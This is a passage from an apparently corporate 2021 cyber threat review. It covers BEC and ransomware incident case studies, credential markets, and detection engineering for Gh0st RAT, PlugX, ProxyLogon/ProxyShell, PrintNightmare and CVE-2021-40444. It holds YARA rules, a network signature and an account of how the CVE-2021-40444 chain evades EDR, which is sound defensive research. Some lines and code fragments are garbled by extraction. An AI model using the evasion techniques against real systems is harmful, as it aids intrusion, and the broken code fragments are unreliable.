bank account. BEC attacks centre on social engineering and victim manipulation, but more sophisticated cases may involve several other techniques, including the compromise or abuse of valid credentials to gain initial access to a network, or even malware. BEC scams may vary widely in scope, but across the board can have devastating effects on individual victims and cause material economic loss to organisations. In 2020 alone, the US Internet Crime Complaint Center (IC3) reported that losses from BEC cases exceeded US$4.1bn.[57] This figure, which only includes the United States, needs to be considered in the context of a type of fraud that is for the most part under-reported and a global threat. In 2021, our Incident Response team provided support on multiple BEC cases across different countries. In both of the case studies outlined below, the threat actor pretended to act on behalf of a sister or affiliated organisation or party in a country different from the victim organisation’s own. ##### Incident Response case study: BEC incident in Southeast Asia A Southeast-Asian victim organisation received a number of emails, supposedly from a related party in the Philippines, advising that payments should be made to alternative bank accounts supposedly belonging to them. The alternative bank accounts allegedly owned by the victim’s sister company were opened in Malaysia, and actually controlled by a threat actor. ----- ##### Incident Response case study: banking on trust across the globe Since at least late 2020, a threat actor likely compromised an Australian company. In early January 2021, the threat actor sent an email to the Australian company. The email contained a copy of the previous email thread, and included threat actorcontrolled email addresses that masqueraded as employees of the Dutch organisation. The threat actor sent another email, requesting the Australian organisation to send the funds to a new bank account in Hong Kong (controlled by the threat actor). At this point, the threat actor also responded to the Dutch organisation impersonating its Australian client, saying that the invoices had been processed. **Late** **2020** The threat actor followed up with the Dutch organisation further, still impersonating the Australian company, to buy time while the funds were being deposited **January** **2021** The threat actor was able to read the email conversation between the Australian company and PwC’s Dutch client The threat actor exchanged emails with the Australian company. Follow-ups and emails containing payment instructions appeared to originate from the Dutch company’s chief financial officer and chief commercial officer The Australian company received the new bank details, transferred the funds, and believed they had completed the business deal with the Dutch organisation ----- ## Threat vector spotlight: credential access In 2021, we observed threat actors of all motivations seeking initial access into victim networks by exploiting valid credentials[58] either obtained through dark web markets, or through earlier credential phishing campaigns.[59] For example, in December 2021 Mandiant[60] reported that clusters of activity associated with the threat actor responsible for the SolarWinds intrusion, which we track as Blue Dev 5, gained initial access into some victim organisations by using legitimate credentials. Blue Dev 5 likely obtained these from a third-party actor that had gathered them through a prior info-stealer malware campaign. PwC’s tracking of ransomware operator White Apep (aka Darkside, BlackMatter) – both from research by the threat intelligence team and engagements conducted by our incident response team – also reveals how ransomware threat actors made use of legitimate credentials as one of their main attack vectors.[61] Among these, White Apep was observed attempting to purchase credentials of organisations of a certain size from Russian-speaking dark web forums, which would be used in valid accounts attacks.[62] ##### Credential marketplaces Analysis of the trade in compromised access credentials in three major criminal forums has highlighted the high volumes of data and access currently available to criminal threat actors, either through the simple leaking of compromised data, through auctions, or through private sales to individual buyers. The main sectors favoured by vendors are: - Financial Services; - Government; - Technology, Media and Telecommunications; and, - Retail. On the forums that PwC monitors, over a three-month period at least 600 threat actors were involved in the sale of access credentials, compromised databases, collections of identity documents, and at least 12 vulnerabilities or their associated exploits. While ransomware actors are an obvious client base for these marketplaces, access to e-commerce platforms likely for exploitation by payment card fraud was also evident.[63] ##### Incident Response case study: valid credentials transport CryLock PwC responded to an incident impacting an organisation in the transport sector, whose subsidiary was hit by a CryLock ransomware attack. The threat actor gained initial access to the network by abusing valid credentials that had been compromised and leaked. The threat actor proceeded to deploy CryLock ransomware on critical systems that resided on the same network segment as operational technology (OT) systems, which were involved in critical functions for the business. Both OT and IT were compromised as part of the incident, with the threat actor demanding a ransom to revert systems from their unusable state. An important detail that emerged from the incident response process was that the client was unaware that the subsidiary’s cyber security was under their governance until the attack happened. This stresses the need for organisations, particularly those that have subsidiaries or related entities, to have clear policies and governance structures in place for information and cyber security. It also highlights the importance of incident response playbooks that detail roles, responsibilities, and plans to follow in case of compromise, and which have been tried and tested in exercises prior to an actual real-world event to ensure that they are viable and adequate. ----- # Trends in # detection ----- ##### Network In the last year, we added 1,300 content rules, and an additional 21,000 simple IOC rules, to our network threat detection holdings. These new rules cover over 90 threat actors, 30 of which were new this year, and 200 cover unique pieces of malware, plus a wide range of more generic detections. **Figure 9 - MITRE mapping - network** T1071, 72.7% Other, 9.2% T1190, 9.2% T1095, 3.4% T1573, 3.1% T1090, 2.5% Source: PwC ##### Finding the Gh0st in the machine In the spring of 2009, the Information Warfare Monitor published an article titled Tracking GhostNet[64], in which they discussed Gh0st RAT. This well-known malware family is named after the default fingerprint string the malware uses as the start of its malware traffic: Gh0st. Despite over a decade having passed, and after the leak of its source code, Gh0st RAT is still in use today, with a wide range of fingerprint strings and several China-based threat actors having used variants of it.[65] In 2021, hunting for Red Menshen activity, we identified a custom variant of Gh0st RAT used by the threat actor between at least August 2020 and March 2021. Red Menshen’s Gh0st RAT variant contained nonstandard fingerprint strings and server-side packet markers, and connected on port 10,000 to C2 servers mainly having Alibaba IP addresses.[66] Red Djinn also used a custom variant of Gh0st RAT (known also as Consock and Gh0stTimes) throughout 2020 and 2021, in activity mainly targeting organisations in East Asia as well as, occasionally, in the US.[67] There have been many write-ups of the format of the Gh0st RAT payload header, to enable defenders to better detect the malware’s network traffic. In its basic, standard form the payload header can be summarised as: - The fingerprint string, defaulting to Gh0st; - Four bytes for the total size of the payload and this header; - Four bytes for the size of the payload once uncompressed; - Zlib compressed payload (begins with 0x78 0x9c). Typical Gh0st network packets will start with this: 00000000 47 68 30 73 74 ee 01 00 00 2e 06 00 00 78 9c b6 Gh0st... ./...x.. Since this initial beacon, and most server responses, will be small, it is tempting to write a generic detection like the following when writing a network signature: content:”|00 00 78 9c|”; offset:11; depth:20; content:”|00 00|”; distance:-8; within:2; Deploying a signature like this, though, would be a mistake as there is a lot of legitimate network traffic that has ZLIB compressed payloads that match this – particularly backup software. Thankfully most modern IDS platforms have ways of doing extended processing on detections. For example, with Suricata and Snort 3.x it is possible to use Lua, and Zeek has native scripting. Simply comparing the size of the packet against the size in the header is a good starting point. We can then take this a step further, and decompress the payload. The first (decompressed) byte of the Gh0st payload identifies the command or token, enabling detailed alerting or logging. The total size of the decompressed payload can also be compared against the size in the header for further reduction of false positives. This approach is something we use across a range of malware, decoding communication to improve both detection confidence and the quality of information available to defenders. Monitoring network egress points for malware is a simple and effective way of providing coverage to an entire network. This complements host-based detection, where deployed, and provides coverage of devices that cannot have agents deployed. ----- ##### Endpoint In 2021, we created 1,088 additional endpoint behavioural detection rules, spanning multiple endpoint detection and response tool syntaxes. Execution and Evasion remain the most prevalent tactics that we observe at the endpoint level, as threat actors use a wide variety of techniques to achieve code execution and escape system controls. **Figure 10 - MITRE tactics mapping - endpoint** TA0005, 33.7% Other, 24% TA0002, 16% TA0003, 13.3% TA0004, 6.9% TA0001, 6.1% Source: PwC TA0001 - Initial Access TA0002 - Execution TA0003 - Persistence TA0004 - Privilege Escalation TA0005 - Defence Evasion DLL hijacking remains an extremely common technique, since it allows the threat actor to achieve code execution, and to do so from the context of a process that is not as likely to be monitored for abuse, hence evading defences. Chinabased threat actors have been performing various modes of DLL hijacking – including sideloading legitimate benign executables, or search order hijacking – to load different malware families for years, and this trend has continued in 2021. For example, Red Dev 17 has used these techniques to load and execute Chinoxy[68] as well as a PoisonIvy variant[69]; meanwhile Red Orthrus (aka APT23, Keyboy) did so to execute the KeyBoy RAT (aka CotXRAT).[70] During post-exploitation, while PowerShell remained common, we observed threat actors and offensive security frameworks increasingly adopting .NET and C# tools (for example Sharpshell, Sharpsploit, or Sharphound) which are more likely to successfully evade detection. While extremely popular still, the former has attracted more scrutiny from defenders and become subject to heightened security controls over the last few years. Advances in Cobalt Strike evasion also became more prominent, with greater usage of Cobalt Strike Beacon Object Files which enable greater stealth capabilities. We saw greater focus on unhooking EDR and other security products from the OS, which effectively prevents them from seeing the activity the attacker is running while the security product remains in a running state. Using compromised or vulnerable drivers in order to gain the required access into the OS has also maintained traction. ----- ##### Case study: hiding in plain sight - abusing legitimate services for malware delivery and C2 Throughout 2021, file-sharing services and messaging platforms continued to be abused by threat actors to stage lure documents, spread malware, and implement command and control (C2) and exfiltration channels. While the use of legitimate collaboration and communication services for nefarious purposes is not new, the increased reliance of many businesses on these services for day-to-day operations makes them an attractive option for threat actors to bypass perimeter security controls. From a defender’s perspective, the difficulty lies in discerning between benign and malicious use of legitimate services. **Payload staging** For example, Scarlet Ioke (aka Ocean Lotus, APT32) likely distributed Cobalt Strike beacons bundled into archives via Dropbox[71], and the threat actor PwC tracks as White Dev 85 previously hosted lure documents on both Dropbox and OneDrive[72]. PwC observed Black Shoggoth (aka APT37) downloading a ROKRAT variant from a Google Drive instance, which then attempted to download another file from a Box instance and sent fingerprinting information to a preconfigured Dropbox account[73]. The backdoor, a staple in the threat actor’s arsenal, can also be configured to interact with other legitimate services[74]. **Exfiltration** In the training materials purportedly belonging to White Onibi, the threat actor in control of Conti ransomware, recruits were instructed to register for mega[.]io, a file sharing service, and use Rclone[75] to exfiltrate data from disk to this service[76]. Additionally, freely available open source frameworks such as FSecure C3[77] can also be configured to use numerous legitimate services for C2 channels, including but not limited to Slack, Discord, GitHub and OneDrive, further extending the C2 capabilities of tools like Cobalt Strike. **C2 interaction** Additionally, some services also publish an API, allowing developers and malware authors alike to interact with the service. In May 2021, we observed a campaign targeting Afghan government entities with a Remote Access Trojan (RAT) that uses Dropbox for C2 activity[78]. The malware, which is referred to as BoxCaon in open source[79], contains a hardcoded bearer access token to interact with Dropbox. After installation, the malware creates a victim-specific folder on the Dropbox repository, and uses the Dropbox API to upload files, execute commands, or read files from the C2. Threat actor abuse of legitimate services proves challenging as it can provide a mechanism for bypassing web filtering allow lists. Furthermore, this can make network detection more difficult, especially if these services are in use at a victim organisation or one of its third parties, which allows the malicious communications to blend in with legitimate traffic. In addition to standard data loss prevention and access management approaches, there are a range of options for detection of anomalous use of these services. In order to reduce the risks associated, consideration should be given to restricting traffic to only authorised or business critical file-sharing and collaboration services across the environment, coupled with employee training to understand the risks associated with these external services. Endpoint detection methods would involve checking for access to these sites from non legitimate service applications or browser processes. Signer checks should be involved to ensure that masquerading is not used to bypass detection, as well as checks for process injection into these native legitimate service applications (such as checking for process injection into Dropbox.exe). Further checks to ensure that detections aren’t bypassed would be to check for any DLL hijacking vulnerabilities for these legitimate service applications that would allow a threat actor to load a ----- ## Yara **Figure 11 - YARA rule breakdown per threat actor region** APAC, 59.8% N/A, 19.5% CRIME, 9.8% MEA, 5.5% EURO, 5.4% Source: PwC 2021 saw a large portion of our detection rules written for threat actors based in the Asia Pacific (APAC) region. There are several reasons for this: the first and foremost being our specific visibility and collection which will inevitably differ, to some extent, from those of other organisations. We observed a high volume of different malware families and variants being developed and updated by threat actors based in APAC, with heavy reliance on custom implants and backdoors as opposed to living-off-the-land or off-the-shelf tools. MEA-based threat actors were also observed using diverse techniques, including credential phishing and social engineering, through to commercial and open source tools such as remote utilities. In tracking such threats, we focused on tracking of infrastructure (including domain naming conventions and egress infrastructure), network data analysis, as well as hunting for samples based on strategic attributes.Our investigations into malicious activity by threat actors based in Europe focused even further on infrastructure tracking and hunting for initial stage lure documents using heuristic terms. Samples of malware attributed to Russiabased as well as other Europe-based threat actors are not as frequent to come by in open source or from our visibility into networks and collection. ##### Case study: hunting for encoded payloads with YARA In this section, we will highlight a couple of YARA rules we wrote in 2021 which are searching for encoded files. By focusing on encoding mechanisms and custom formats, we were able to uncover more samples that we might otherwise miss across malware families used by multiple threat actors. The comments within the YARA rules that we share below ----- **Red Lich Encoded PlugX** ``` import “math” rule Red_Lich_Encoded_PlugX : Red_Lich { meta: description = “Detects PlugX payloads that have been encoded with a multi-byte XOR key (of varying ``` length) that is stored at the start of the file. Many of these decoded payloads are associated with Mustang Panda.” ``` TLP = “WHITE” author = “PwC Cyber Threat Operations” copyright = “Copyright PwC UK 2021 (C)” created_date = “2021-03-31” ``` modified_date = “2021-10-29” ``` revision = “3” ``` hash = “5eaaf8ac2d358c2d7065884b7994638fee3987f02474e54467f14b010a18d028” hash = “d69d200513a173aff3a4b2474ccc11812115c38a5f27f7aafe98b813c3121208” hash = “94c7965e0fba7deb71ca0ff7901b1a1074b41140528ea5bc75a14dfbd3782c8b” hash = “56e9b0c2b87d45ee0c109fb71d436621c7ada007f1bd3d43c3e8cf89c0182b90” reference = “https://twitter.com/dtcert/status/1454022175254618114” ``` strings: ``` $dos = “This program cannot be run in DOS mode.” ``` condition: ``` **// Rule out some file headers** ``` ( uint16(0) != 0x5A4D and //PE uint32(0) != 0x464c457f and //ELF uint32be(0) != 0x504B0304 and //ZIP uint32be(0) != 0x41564620 and //AVF uint32be(0) != 0x414b504b and //PKG ``` uint16be(0) != 0x4944 and uint8(2) != 0x33 and //MP3 ``` uint32be(0) != 0x25504446 and //PDF uint32be(0) != 0xd0cf11e0 and //PPT uint32be(0) != 0x4d534346 and //CAB ``` uint32be(0) != 0x556e6974 and //Unity ``` uint32be(0) != 0x38425053 and //PSD uint32be(0) != 0x63616666 and //caff uint32be(0) != 0x64617461 and //data uint32be(0) != 0x664c6143 and //fLaC uint32be(0) != 0x424b504b // BKPK ) and ( not $dos ) and ``` **// Strict filesize** (filesize > 50KB and filesize < 800KB) and **// Check if there is an XOR key at the beginning of the file in the range [A-Za-z]** for any i in (4 .. 0x1F) : ( uint8(i) == 0x00 and for all j in (0 .. i-1) : ( for any k in (0x41 .. 0x5A) : ( ``` uint8(j) == k ``` ) or for any k in (0x61 .. 0x7A) : ( ``` uint8(j) == k ) ) ) and ``` **// Entropy should be sufficiently high** (math.entropy(0, filesize) >= 6.8 and math.entropy(0, filesize) < 7.9) and **// Check that the last 10 characters are in the range [A-Za-z]** for all i in (filesize - 10 .. filesize - 1) : ( for any j in (0x41 .. 0x5A) : ( ``` uint8(i) == j ``` ) or for any j in (0x61 .. 0x7A) : ( ``` uint8(i) == j ) ) } ``` ----- Throughout 2021, we continued to monitor the activity of the China-based threat actor we track as Red Lich (aka Mustang Panda). In particular, we have previously reported on variants of the PlugX remote access trojan which it has used to target a variety of organizations globally, and written several YARA rules to detect these variants and its loaders. However, a challenge to tracking these samples is in identifying the encoded versions of PlugX. The actual PlugX RAT is never written to disk in a plaintext format; instead, it is XOR-encoded with a variable length key which is prepended to the encoded file, and decoded at runtime by a loader component. **Red Apollo/Red Kelpie MS13-098 DLLs** ``` import “pe” import “math” ``` As such, we sought to develop a YARA rule to detect the encoded variants of PlugX, taking advantage of the fact that the encoded payload only uses alphanumeric characters for its XOR key. Using this rule (and some automation scripts to help decode them and extract configurations), we were able to map out many more samples and IoCs associated with Red Lich. rule Microsoft_Signed_DLL_With_High_Entropy_Data_After_Digital_Signature : Heuristic_and_General { ``` meta: description = “Detects Windows signed DLLs that have had a payload encrypted and embedded in the ``` digital signature section which is at least 50KB in size (seen by APT10 with its DESLoader/SigLoader ``` campaigns)” TLP = “WHITE” author = “PwC Cyber Threat Operations :: BitsOfBinary” copyright = “Copyright PwC UK 2021 (C)” ``` license = “Apache License, Version 2.0” created_date = “2021-02-19” modified_date = “2021-02-19” ``` revision = “0” ``` hash = “8ef94327cab01af04a83df86a662f3abe9ae35aa1084eff7273d8292941bebdb” hash = “69adaf19cc19594e0193da88597b6af886f1c0e148ad980fa0fe3f9250d52332” hash = “697be6add418ca9e1ebcef6cc6fdbb6277851e1892e48264b1e6720e48122c40” reference = “https://www.lac.co.jp/lacwatch/report/20201201_002363.html” ``` strings: ``` $timestamp = “Microsoft Time-Stamp PCA” ``` condition: ``` **// Start with some initial conditions to rule out most samples (e.g. check that it’s a DLL with one** **signature from Microsoft)** uint16(0) == 0x5A4D and filesize < 1MB and (pe.characteristics & pe.DLL) and pe.number_of_signatures == 1 and for any sig in pe.signatures : ( sig.subject contains “O=Microsoft Corporation” and sig.subject contains “CN=Microsoft Windows” ``` ) and ``` **// Sanity check that the timestamp string we’re looking for is actually in the digital signature** **section** **// Throughout these next conditions, we only care about the last timestamp string, i.e. @** **timestamp[#timestamp]** ``` ( ``` @timestamp[#timestamp] > pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_SECURITY].virtual_ ``` address and ``` @timestamp[#timestamp] < (pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_SECURITY].virtual_ address + pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_SECURITY].size) ``` ) and ``` **// Check that the extra data at the end of the digital signature section is greater than roughly 5KB** ``` ( ``` pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_SECURITY].size - (@timestamp[#timestamp] pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_SECURITY].virtual_address) > 5000 ``` ) and ``` **// Extra check to make sure the entropy of this extra data is very high (i.e. encrypted)** ``` ( ``` math.entropy(@timestamp[#timestamp], (pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_ SECURITY].size - (@timestamp[#timestamp] - pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_SECURITY].virtual_ address))) > 6 ``` ) } ``` ----- Between late 2020 and early 2021, multiple open source reports explored campaigns operated by the China-based threat actor we track as Red Apollo (aka APT10, menuPass).[80 ] 81 Such research detailed a variety of different malware families used by the threat actor as part of its new campaigns targeting managed service providers. As part of these campaigns, the threat actor chose to exploit an old vulnerability, CVE-2013-3900 (also identified by Microsoft as MS13-098), which allows a threat actor to embed data in the digital signature of some Microsoft signed binaries, but still have the digital signature appear valid. Red Apollo used this technique to encrypt, and store backdoor payloads in the digital signature of DLLs, which it would then load at runtime. While detecting the payloads used by Red Apollo is useful for malware classification, being able to search for samples abusing MS13-098 allows us to hunt for any samples using that technique, and potentially to find new payloads. To this end, we wrote the YARA rule “Microsoft_Signed_DLL_ With_High_Entropy_Data_After_Digital_Signature” with the following condition: - Determine if the binary is a DLL with one signature, which has organisation “Microsoft Corporation”, and common name “Microsoft Windows”; - Find the last occurrence of the string “Microsoft Time Stamp PCA”, and check it lies within the section of the digital signature itself, which is called “IMAGE_ DIRECTORY_ENTRY_SECURITY” (i.e., to find the approximate end of the signature); - Check that from the end of this timestamp that the rest of the “IMAGE_DIRECTORY_ENTRY_SECURITY” section is greater than 5KB (i.e., there is extra data at the end of the digital signature); and, - Finally, check that this extra data has an entropy (a rough measurement of randomness) higher than the value 6 (i.e., corresponding to potentially encoded/encrypted data). Not only did this YARA rule uncover further Red Apollo samples, but was able to detect Red Kelpie (aka APT41, BARIUM) using this same technique to load payloads including CobaltStrike Beacons and the backdoor known as SIDEWALK.[82] This research was discussed publicly at TheSAS2021,[83] where we also released a collection of YARA rules to detect further Red Kelpie samples.[84] ----- # CVE # spotlight ----- 2021 registered the largest number of 0-days disclosed in a single year[85] with 57 reported by Project Zero, more than doubling the 25 reported in 2020. In our 2021 Year in Retrospect report, we provided strategic context for such an increase in vulnerability discovery and disclosure, specifically highlighting: - the topic’s renewed prominence in national security conversations; - greater financial incentives; - the activity of commercial brokers; - and, a focus on targeting organisations involved in the software supply chain, leading to a heavier investment of resources into researching vulnerabilities in technologies widely adopted across the public and private sectors. Vulnerabilities that have long been publicly known continue to be exploited by threat actors, and should not be underestimated. However, the disclosure of 0-days and related exploit code has led to high volumes of intrusion attempts by threat actors of all motivations, particularly in 2021. While all organisations might not be able to immediately patch or update their systems, it is worth understanding 0-days are not an insurmountable security threat, but rather as previously undisclosed threat vectors whose abuse can often be detected or even stopped by defenders. In effect, a focus on detection and response measures, including logging, monitoring, and basic security hygiene, can make a difference in the impact that 0-day exploitation might have on organisations. This section discusses several high-profile 0-day vulnerabilities that were disclosed throughout 2021, and some of which were quickly incorporated in offensive security tools often abused by threat actors. The vulnerabilities covered here were chosen due to being high-profile, high-impact, or complex to detect. ##### Microsoft Exchange We investigated a collection of critical vulnerabilities in on-premises Microsoft Exchange servers in 2021 which were used by both criminal and espionage-motivated threat actors. **ProxyLogon** In March 2021, activity took place surrounding a series of vulnerabilities in on-premises Microsoft Exchange servers, which are collectively referred to as ProxyLogon.[86] A China-based threat actor, Red Dev 13, known in open source as HAFNIUM, began exploiting vulnerabilities in Microsoft Exchange likely at the beginning of 2021 to compromise these servers.[87 88] While the initial activity surrounding ProxyLogon was associated exclusively with HAFNIUM, at the end of February/beginning of March (close to the time of the first public disclosure of these campaigns), multiple China-based threat actors began to start exploiting the same vulnerabilities, on a mass scale rather than with precise targeting.[89] In particular, we observed several China-based threat actors using the ProxyLogon exploits, including Red Dev 14,[90] and Red Djinn (aka BlackTech).[91] It is not uncommon for China-based threat actors to share tools. However, this level of activity is unprecedented due to the rapid sharing of these exploits ahead of the patching of the Exchange vulnerabilities. While we cannot prove that HAFNIUM directly shared these exploits with other threat actors, given the sudden surge of activity from a wide variety of China-based threat actors before the vulnerability’s public disclosure, it is highly likely they obtained access to the exploit in some format to run their own campaigns and to do a last ditch effort to compromise Exchange servers before they were patched. While initial proof-of-concepts (PoCs) showed that it was possible to steal emails from an Exchange server without authentication, the real impact came from the potential from authenticated remote code execution on any unpatched Exchange server. This meant that a large amount of the initial activity was that of webshells being deployed, which could then be used by threat actors to take further actions on an infected server, including laterally moving to further systems within an organisation. A large proportion of such webshells was the widely-used China Chopper, whose source code is openly available and which, for over a decade, has been deployed by multiple threat actors – including ones not operating out of China. As is the case with many critical vulnerabilities, eventually threat actors will obtain access to the corresponding exploits, either through researching it themselves, or through open source PoCs released by security researchers. It didn’t take long with the Microsoft Exchange vulnerabilities for ransomware threat actors to begin exploiting them, with an eventual strain of ransomware called DearCry being deployed on unpatched Exchange servers.[92] Based on the fact that samples of DearCry had compilation timestamps of 9th March 2021, and that they weren’t as sophisticated as other more established ransomware ----- Activity like this also raises other concerns. Even if a threat actor drops a webshell to a compromised server and does not use it to perform further actions immediately, if the webshell is left installed without remediation then it is possible that either the original threat actor may use it again in the future, or that other threat actors may search for it to try and gain initial access. In the case of ProxyLogon, many of the webshells used were analysed in open source, or available on online multi-antivirus scanners, meaning that the passwords used for the webshells were readily available in open source. **ProxyShell** Later in 2021, more vulnerabilities were revealed affecting on premises Microsoft Exchange servers, which were named ProxyShell, and which could again allow for a threat actor to perform unauthenticated remote code execution against Exchange servers.[93] It only took two days before this was observed being exploited in the wild.[94] Our analysis uncovered webshells being dropped by ProxyShell that were then used to then load further payloads to provide lightweight backdoor access to an infected system.[95] Given the similarity in webshells observed being dropped by ProxyShell to that of ProxyLogon, we assessed at the time that the early ProxyShell campaigns were, with realistic probability, conducted by that of a China-based threat actor. In particular, there was some similarity to that of webshells used by HAFNIUM by ProxyLogon before other China-based threat actors began using the same exploits, but we do not have enough evidence to attribute these campaigns to HAFNIUM. **Detection engineering on Microsoft Exchange** With the level of access granted by the ProxyLogon/ProxyShell exploits, attackers generally seek to gather credentials or move laterally into the network. In doing so, they use techniques that are detectable by EDR. An example of a behaviour that can be detected is the creation of a potential webshell in the root directory of a web server. Furthermore, we have multiple rules that detect commonly abused Windows processes spawned by web server processes. Should a web server process spawn an abusable Windows process, a parent-child process relationship will be created between the two processes. This behaviour is often seen upon successful remote code execution, as the code that is being executed within the web server process will often attempt to use an abusable Windows process for the next step in the attack. Lastly, we have high confidence in our detection rules that monitor web server processes dropping executables or scripts to disk. Alerts from these detection rules would warrant further investigation. A number of our rules detect an attacker’s attempt to steal credentials from a compromised endpoint. We have rules that detect common memory dumping applications interacting with LSASS – the Windows service that is responsible for enforcing the security policy on the system, frequently storing credentials in memory. Attackers use memory dumping applications to steal credentials: the most well-known of such applications is Mimikatz. We signatured two further techniques that were observed in the ProxyLogon attacks. Focusing in particular on the Exchange server processes, we signatured the ‘umworkerprocess.exe’ and ‘umservice. exe’ processes spawning further unexpected processes, which may be indicative of the successful exploitation of an Exchange server. Lastly, we signatured ‘umworkerprocess.exe’ writing non-standard content to disk. This process only writes specific types of files to disk, so a file written outside of these types may be indicative of a compromised process. Vulnerable applications that are exposed to the internet are an increasingly popular vector of initial access for attackers.[96] The classic initial access vector using weaponised email attachments – while still a highly popular and reliable option for attackers – is facing more hurdles as virtualisation and sandbox technologies mature. It is important to ensure any application that is exposed to the internet is fully patched with th l t t it d t Mi ft l d t h f P L ----- **Incident Response case study: Austrian company attacked with Makop ransomware** PwC’s Incident Response team responded to a ransomware attack affecting a client in Austria. The company’s IT department started facing problems with its mail server in the end of November, before they had clear evidence that they were the victim of a ransomware attack. The attacker gained remote access at the end of November, encrypted the vast majority of the company’s systems with Makop ransomware, and performed “FastErase” on the backup tapes. One of the central Active Directory domain controllers was not encrypted, but renamed by the attacker, which left a 4TB file on the OS partition to make it more difficult to remediate the server. Notably, the ransomware actor threatened to delete the decryption key within 24 hours to increase pressure on the client. After forensics investigation, we found no indicators of data exfiltration, but identified artefacts evidencing the use of Mimikatz for password extraction. The first threat actor activity on the corporate network was found three days before the ransomware attack occurred. The threat actor’s initial access vector was via a vulnerable Microsoft Exchange server. The exploitation of CVE-2020-0688 alone does not indicate any special abilities of the attacker, but its modus operandi – such ----- ##### PrintNightmare Another series of vulnerabilities uncovered this year were focused on the Windows print spooler service, allowing for remote code execution and local privilege escalation attacks against servers running the service. A specific version of this vulnerability was given the name PrintNightmare.[98] Initially there was some confusion about which vulnerability “PrintNightmare” actually referenced. CVE-2021-1675 was initially thought to be the main vulnerability (which a PoC was briefly made publicly available for, and which Microsoft released a patch for);[99] however, the patch for this vulnerability did not fix PrintNightmare, which was eventually given the identifier CVE-2021-34527.[100] The print spooler vulnerability that was being exploited (as well as what system it was running on) would determine the potential impact of successful exploitation. The highest impact would be the ability to escalate privileges on a Windows Domain Controller Server, allowing attackers full access to all aspects of a company’s infrastructure. To mitigate this, some companies were disabling the print spooler service on domain controllers. This, however would not fix the vulnerability running on any unpatched, or configurationally vulnerable Windows client machines. This would allow attackers then to escalate privileges locally from an initial phishing vector to bypass local security controls, and potentially move laterally with greater freedom until they could discover an administrator system and use the vulnerability to escalate privileges and dump their credentials, which would allow them access to the domain controller as well. June and July of 2021 saw the release of a number of advisories and patches from Microsoft relating to vulnerabilities existing in the print spooler service, which if exploited, could grant an escalation of privileges. This, likewise, saw numerous discussions and code releases from the offensive security community demonstrating that the patches were either ineffective at fixing the issues fully, or were easily bypassed, with updates to the relevant open source tools to make those bypasses generally available – as was the case with Mimikatz. ##### Detection engineering with the print spooler PrintNightmare has been integrated into open source offensive security tools such as Mimikatz and Metasploit, with additional modules for Cobalt Strike. In October 2021, QakBot was also seen adopting PrintNightmare for privilege escalation.[101] Detections for malicious activity exploiting it revolved around the HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Drivers\Version-3\* registry key where various settings for the printer driver could be found. The default settings for a number of open source tools could be signatured and detections written for them, such as the creation of the key HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Drivers\Version-3\1234 or HKLM\SYSTEM\CurrentControlSet\Control\ Print\Environments\Windows x64\Drivers\Version-3\12345. However, threat hunting proves to be a much more difficult task when these particular key names were not used, due to the sheer number of legitimate printer related installations or configurations. A better method revolved around tracking the absence or existence of registry values in the HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Drivers\Version-3\* key location. While detecting related malicious activity in network traffic was nontrivial, we found a viable solution by looking for a chain of requests and responses, starting with Spoolss, then EnumPrinterDrivers, before multiple AddPrinterDriverEx requests and responses. The resulting chain, along with detection for a buffer overflow response from the target, provided a high confidence detection of successful exploitation. [101] . ----- ##### CVE-2021-40444 In September 2021, Microsoft released an advisory for a remote code execution (RCE) vulnerability (with identifier CVE2021-40444) which allows a malicious MS Cabinet (.cab) or .inf file to be launched when a malicious document is opened.[102] While the vulnerability still requires the threat actor to phish a victim and convince them to open a malicious document, it does provide another approach for threat actors to initially execute code on a victim system, and the fact that macros are not needed to exploit the vulnerability might also avoid alerting victims to the malicious activity. A document exploiting CVE-2021-40444 embeds a URL in their ‘document.xml.rels’ file. This is a similar technique to that of template injection, but rather than the Word document fetching a remote template, the file attempts to load some HTML. The relevant XML tag in the document is as follows: A specifically crafted HTML webpage could contain code to exploit CVE-2021-40444 to achieve RCE; and, using that RCE, perform a follow-on action, such as downloading and executing a next-stage payload. Our analysis of the first observed CVE-2021-40444 documents revealed some infrastructure overlaps with that of ransomware groups; however it was inconclusive whether it was a cyber crime focused threat actor that initially developed and exploited this vulnerability.[104] ##### Detection engineering on CVE-2021-40444 While CVE-2021-40444 exploited Microsoft Office applications that are usually heavily signatured by detection engineers, it produced a particularly unfortunate string of behaviours as far as detection is concerned. In most situations, monitoring for Office Applications spawning suspicious processes is an incredibly simple and effective means of detecting malicious activity on an endpoint. These processes usually support the objective of the attacker, and examples of such processes are powershell.exe, rundll32.exe or mshta.exe. The exploitation of CVE-2021-40444 suprasses many endpoint detection rules surrounding Microsft Office applications. Upon analyzing the execution chain, it appears to indicate that common EDR detection rules were potentially examined to determine the best possible way of bypassing EDR products and achieve a stealthy execution of the payload. The first bypass techniques take place when the MS Cabinet (.cab file) is downloaded to disk. The Cabinet file contains a DLL which is unpacked to a relative location and given a .inf extension. Microsoft Office applications commonly drop files with a .inf extension, so giving the malicious file this extension means the behaviour blends in with normal system activity. The .inf file uses a relative reference (..\.inf) to ensure that it is written to an unpredictable cache location. Such locations are particularly hard for threat hunters to triage due to the presence of a high number of temporary system files. To become even more evasive of EDR signatures, .cpl:is prepended to the file’s document.URL parameter. This simple addition has two intended effects, both of which reduce the chances of detection. First, ActiveX cannot execute .cpl files, so will automatically pass this execution to the ‘control.exe’ process. This results in the Microsoft Application spawning control.exe – a behaviour that was not commonly monitored prior to this exploit becoming public. Second, the .inf file that follows the .cpl: parameter is immediately passed to rundll32.exe. Although threat hunters usually keep a keen eye on this process, in this instance it features command line arguments that are very common and highly likely to be ‘tuned out’ of detection rules. This is of great convenience to the attacker as it means their activity might be excluded from existing detection rules. Focusing at the start of the attack, we have network signatures that detect the malicious response to the initial .cab file request. On the endpoint, the most straightforward means of detection is to look for a cpl: string in the command line of either control exe or rundll32 exe We also monitor for artefacts in powershell.exe, rundll32.exe or mshta.exe. temporary system files. ----- ##### Log4Shell/Log4J Wrapping up the year were several critical vulnerabilities found in the Java-based logging utility Apache Log4j 